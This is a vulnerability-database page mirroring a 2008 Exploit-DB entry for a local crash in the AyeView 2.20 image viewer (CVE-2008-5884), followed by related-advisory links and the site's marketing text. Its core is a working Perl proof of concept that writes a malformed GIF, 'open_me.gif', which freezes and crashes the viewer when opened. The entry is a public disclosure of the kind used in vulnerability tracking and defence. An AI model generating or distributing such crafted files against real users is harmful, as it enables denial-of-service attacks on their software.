Lucene search
+L

AyeView 2.20 - '.GIF' Image Local Crash

🗓️ 04 Oct 2008 00:00:00Reported by suN8HclfType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

AyeView v2.20 DoS Exploit by suN8Hcl

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-5884
4 Oct 200800:00
circl
cve
CVE
CVE-2008-5884
12 Jan 200919:27
cve
cvelist
Cvelist
CVE-2008-5884
12 Jan 200919:27
cvelist
euvd
EUVD
EUVD-2008-5854
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-5884
12 Jan 200920:00
nvd
openvas
OpenVAS
AyeView GIF Image Handling Denial of Service Vulnerability
15 Jan 200900:00
openvas
openvas
OpenVAS
AyeView GIF Image Handling Denial of Service Vulnerability
15 Jan 200900:00
openvas
prion
Prion
Design/Logic Flaw
12 Jan 200920:00
prion
Name      : AyeView v2.20 (malformed gif image) DoS Exploit
Credit    : suN8Hclf (DaRk-CodeRs Group), [email protected]
Download: : http://www.ayeview.com/downloads.htm
Greetz    : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind,
            Katharsis, all from #dark-coders and others;]

PoC:



#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# AyeView freezes and after few seconds crashes...
# Tested on Windows XP SP2 & Windows 2000 SP4

my $code="\x47\x49\x46\x38\x39\x61\xff\xff\xff\xff\x0e".
         "\x00\x00\x2c\x00\x00\x00\x00\xff\xff\xff\xff\x00";
my $file="open_me.gif";

open(my $FILE, ">>$file") or die "[!]Cannot open file";
print $FILE $code;
close($FILE);
print "$file has been generated\n"
print "Credit: suN8Hclf, www.dark-coders.pl"

# milw0rm.com [2008-10-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation